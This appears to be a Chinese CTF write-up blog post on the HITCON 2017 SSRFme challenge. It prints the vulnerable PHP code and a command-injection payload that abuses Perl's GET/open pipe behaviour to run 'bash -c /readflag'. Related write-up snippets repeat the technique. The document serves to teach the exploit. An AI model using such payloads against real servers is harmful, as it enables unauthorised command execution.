2017SSRFme

最新推荐文章于 2025-07-25 16:41:56 发布
最新推荐文章于 2025-07-25 16:41:56 发布
阅读量231 收藏
点赞数 2
CC 4.0 BY-SA版权
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/javatmnan/article/details/147001132

源码如下:

<?php
// 1. 检查是否存在 X-Forwarded-For 头,若存在则将 REMOTE_ADDR 设置为第一个IP
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
    $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; // 可控点:客户端可伪造IP
}

// 2. 输出客户端IP
echo $_SERVER["REMOTE_ADDR"];

// 3. 创建沙箱目录:基于固定字符串 "orange" + 客户端IP 的MD5值
$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
@mkdir($sandbox);      // 创建目录(如 sandbox/c6a6a758...)
@chdir($sandbox);      // 切换到该目录

// 4. 发起请求:通过 GET 参数 url 执行系统命令
$data = shell_exec("GET " . escapeshellarg($_GET["url"]));

// 5. 处理文件名参数,过滤目录名中的点
$info = pathinfo($_GET["filename"]);
$dir  = str_replace(".", "", basename($info["dirname"])); // 过滤目录名中的点
@mkdir($dir);          // 创建子目录
@chdir($dir);          // 进入子目录

// 6. 将请求结果写入文件(文件名可控)
@file_put_contents(basename($info["basename"]), $data);

// 7. 显示当前文件代码
highlight_file(__FILE__);

这题的关键点显然就在于GET参数url,首先创建一个测试目录,


/?url=/&filename=test

然后将orange与自己的ip地址拼接在一起进行MD5加密,加密后的值就是路径

进入目录

可以看到有flag,但是访问不了,我们可以用readingflag来访问

payload思路是GET,GET在执行过程中会调用Perl的open函数,如果文件名以 | 结尾,Perl 会将其视为命令并执行

构造payload

/?url=file:bash -c /readflag|&filename=bash -c /readflag|
 

/?url=file:bash -c /readflag|&filename=test

再访问之前test目录

得到flag

wanxinmin
关注
【BUUCTF】[HITCON 2017]SSRFme1
2401_86760082的博客
01-23 763
打开题目页面直接给了PHP源码进行代码审计这段 PHP 代码尝试获取客户端的真实 IP 地址。根据客户端 IP 地址创建一个沙箱目录。执行一个GET命令,获取指定url的数据。根据用户提供的文件名创建相应的目录和文件,并将GET命令的结果写入该文件。最后高亮显示当前 PHP 文件的源代码。着重看这里,提示md5加密,可以使用下面这个工具构造URL/sandbox/md5加密后的内容/ez创建一个目录再通过sandbox沙盒目录访问得到根目录存在flag但不能点击再次访问。
BMZCTF hitcon_2017_ssrfme
qq_26243045的博客
11-26 758
考点:perl脚本open命令执行 打开题目显示如下代码 将GET请求到的数据保存在我们自定义的文件名当中。 给url参数传递/可以查看根目录下的内容 Perl的open函数执行会执行给open函数所传递的文件名参数中的系统命令,但是前提是这个文件名是需要存在的。 这道题因为文件名是可以控制的,所以就先生成一个以读取flag命令命名的文件 然后使用file协议去读取文件 访问即可获得flag ...
HITCON2017SSRFME-学习复盘
weixin_56199494的博客
02-25 286
所以我们在请求时,会在下把url的结果写入文件1.php。
HNCTF2017 SSRFME
NYG694的博客
02-01 962
主要的知识点:perl函数看到要打开的文件名中如果以管道符(键盘上那个竖杠|)结尾,就会中断原有打开文件操作,并且把这个文件名当作一个命令来执行,并且将命令的执行结果作为这个文件的内容写入。在首行代码中,explode(‘,’, $_SERVER[‘HTTP_X_FORWARDED_FOR’]) 使用逗号 (,) 作为分隔符将字符串分割成数组。而想执行readflag文件,仅仅是使用file:是不够的,还需要使用Linux下的命令执行:bash -c 首先得满足前面的文件存在,
[HITCON 2017]SSRFme
qq_49422880的博客
11-19 5092
[HITCON 2017]SSRFme详解0x01 前言0x02 考点0x03 分析 0x01 前言   这道题搞了很久,一直以为是自己的问题,后面发现确实如此,试了N多遍终于把结果搞出来了。一定要好好想想~~~~。 0x02 考点   perl脚本GET open命令漏洞;open存在命令执行,并且还支持file函数 0x03 分析 101.84.150.185 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $htt
BUUCTF之[HITCON 2017]SSRFme详解
m0_62107966的博客
09-09 1081
BUUCTF之[HITCON 2017]SSRFme详解 $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);//题目提供了沙盒目录,目录名就是sandbox , 给了沙盒目录, $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);//题目提供了沙盒目录,目录名就是sandbox ,md5是将(orangeip地址)这个整体进行加密。,注意中间不能有空格!
[HITCON 2017]SSRFme1
alwtj的博客
06-22 1403
大概总结一下就是你要传入一个url参数和一个filename参数,url参数会被执行get请求,得到后的内容会被写入到 sandbox/md5(orange.ip)/filename 目录下.首先,通过pathinfo函数解析$_GET["filename"],获取其中的目录名和文件名.然后,它尝试创建一个新的目录(基于目录名,但移除了所有点。最后,使用file_put_contents函数将数据保存到文件中,文件名基于$_GET["filename"]中的基本文件名.不过有一个叫readflag的文件.
关于BMZCTF hitcon_2017_ssrfme的解法
永远是少年
01-12 1038
在BMZCTF中,有一道题是hitcon_2017_ssrfme
buuctf [HITCON 2017]SSRFme
qq_52671379的博客
04-19 688
buuctf [HITCON 2017]SSRFme
BUUCTF_Web([HITCON 2017]SSRFme1)SSRF/代码审计
2401_87524087的博客
01-23 1218
输出IP地址,将orange和ip地址进行拼接,然后md5加密,在 sandbox/ 目录下创建以该哈希值命名的目录,并切换目录,保存数据。
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
[BUUCTF][HITCON 2017]SSRFme
Y4tacker的博客
10-03 6158
文章目录知识点新学会的函数代码审计 知识点 perl脚本GET open命令漏洞 GET是Lib for WWW in Perl中的命令 目的是模拟http的GET请求,GET函数底层就是调用了open处理 open存在命令执行,并且还支持file函数 新学会的函数 pathinfo 代码审计 前面的代码返回了我的ip,和orange一起进行md5加密。通过url参数输入的内容会以GET命令执行, 命令执行的结果会被存入我们以filename参数的值命名的文件里 <?php if (isset
[HITCON 2017]SSRFme 1
03-30
One notable challenge was the **SSRFme task**, which involved exploiting an SSRF vulnerability within a PHP-based system. The provided code snippet demonstrates how the `$_SERVER['...
如何从Kubernetes集群中安全移除节点
xcbeyond|疯狂源自梦想,技术成就辉煌
07-23 693
从 API Server 中移除节点对象,kube-controller-manager 停止监控该节点。通过遵循本指南,您将能够高效安全地管理Kubernetes节点生命周期,确保集群稳定运行。在 Kubernetes 集群的生命周期中,节点维护是不可避免的操作。本指南将详细介绍安全移除节点的全流程,确保操作平滑无感知。的标准流程,配合完善的预检和验证,可确保服务零中断。,阻止新Pod调度到该节点,但现有Pod继续运行。
4G车载录像机的作用详解:提升行车安全与智能管理的核心技术
索迪迈科技
07-22 645
随着物流运输、公共交通、特种车辆等行业对安全与管理需求的提升,4G车载录像机已成为现代车辆智能化管理的重要组成部分。它不仅具备传统行车记录仪的录像功能,还结合4G无线通信、AI智能分析、GPS定位、云存储等技术,实现远程监控、实时调度、驾驶员行为管理等功能。本文将详细解析4G车载录像机的作用,涵盖其在安全管理、车队运营、事故处理、数据管理等方面的核心价值。
飞行控制领军者 | 边界智控携高安全级飞控系统亮相2025深圳eVTOL展
最新发布
Spey_Events的博客
07-25 500
目前,边界智控在团队、产品、技术、业务及融资等各方面均实现了业内领先。2025 深圳eVTOL展的举办,为全球eVTOL产业链搭建了高规格、国际化的交流合作平台,全面多维地彰显了参展企业的卓越实力与行业引领地位,更为推动 eVTOL产业向高质量、规范化、规模化方向发展提供了有力支撑,对引领低空经济未来发展具有重要意义。作为eVTOL飞行控制领域的核心赋能者,边界科技将借此国际平台,全面展示其在核心技术领域的最新突破,与全球业界同仁深入交流前沿理念,共同探讨飞控系统对于推动eVTOL产业发展的核心驱动作用。
输电线路微气象在线监测装置:保障电网安全的科技屏障
WHFENGHE的博客
07-24 304
输电线路微气象在线监测装置通过集成高精度传感器和智能分析技术,实时监测线路环境参数(覆冰厚度、风速风向、温湿度等),具备IP67防护等级和-40℃至85℃工作范围。该装置采用太阳能+锂电池供电,支持4G/5G/北斗多模通信,能提前4-6小时预警覆冰等灾害,降低60%运维成本,适用于高海拔、沿海等复杂环境。未来将结合AI和无人机技术,实现更智能的电网安全管理。
如何判断钱包的合约签名是否安全
duoyasong5907的博客
07-24 121
假如有以下交互,可以看到钱包试图调用地址0xBe535合约的方法Security Update。
水库大坝安全自动监测系统:守护水脉长城的智能防线
2501_92658014的博客
07-23 835
水库大坝安全自动监测系统:守护 “水脉长城” 的智能防线 柏峰【BF-GNSS】水库大坝作为防洪抗旱、水资源调配的关键工程,其安全运行直接关系到下游千万群众的生命财产安全和社会经济稳定。传统的人工巡检不仅效率低下
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值